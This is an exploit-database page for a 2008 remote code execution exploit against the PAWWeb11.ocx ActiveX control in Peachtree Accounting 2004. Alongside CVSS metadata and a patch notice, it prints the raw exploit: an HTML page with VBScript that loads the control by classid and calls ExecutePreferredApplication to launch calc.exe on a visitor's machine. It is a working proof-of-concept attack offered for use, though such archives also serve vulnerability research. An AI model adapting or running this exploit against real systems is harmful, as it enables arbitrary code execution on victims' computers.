header-logo
Suggest Exploit
vendor:
Peachtree Accounting
by:
Jeremy Brown
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Peachtree Accounting
Affected Version From: Peachtree Accounting 2004
Affected Version To: Peachtree Accounting 2004
Patch Exists: YES
Related CWE: N/A
CPE: 2.6.8.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2008

Peachtree Accounting Remote (SfS/SfI) Exploit

This exploit uses a vulnerability in the PAWWeb11.ocx ActiveX control to execute arbitrary code on the target system. The exploit code is written in VBScript and uses the ExecutePreferredApplication method of the PAWWeb11.ocx control to execute the code. The code is tested on Peachtree Accounting 2004 and Windows XP with Internet Explorer 6.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Peachtree Accounting Remote (SfS/SfI) Exploit
     Tested on Peachtree Accounting 2004 / Windows XP / IE6
     All Peachtree software that includes PAWWeb11.ocx are assumed vulnerable -->

<html><body>

<object id=target classid=clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0></object>
<script language=vbscript>


arg1="C:/WINDOWS/system32/calc.exe"
target.ExecutePreferredApplication arg1

</script>
</body></html>

# milw0rm.com [2008-09-10]

Navigation

Suggest Exploit

Services By CQR